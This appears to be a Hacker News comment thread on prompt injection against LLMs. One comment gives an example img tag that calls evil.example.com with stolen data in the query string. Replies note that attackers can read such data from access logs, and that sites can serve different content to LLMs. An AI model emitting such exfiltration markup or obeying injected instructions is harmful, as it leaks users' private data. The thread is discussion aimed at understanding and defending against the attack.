← Back to context

Comment by quuxplusone

3 days ago

Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure.

Yes, even a GET request can change the state of the external world, even if that's strictly speaking against the spec.

  • Wasn't there a HN post where someone made their website look different to LLMs or webscrapers than a typical user? I can't seem to find the post but that could add an extra layer (I mean it is all different if you're viewing from a browser vs curl)

  • Yes, and get requests with the sensitive data as query parameters are often used to exfiltrate data. The attackers doesn't even need to set up a special handler, as long as they can read the access logs.

Once again affirming that prompt injection is social engineering for LLMs. To a first approximation, humans and LLMs have the same failure modes, and at system design level, they belong to the same class. I.e. LLMs are little people on a chip; don't put one where you wouldn't put the other.

  • They are worse than people: LLM combine toddler level critical thinking with intern level technical skills, and read much much faster than any person can.

    • Right. But my point is, they belong to the bucket labeled "people", not the one labeled "software", for purpose of system design.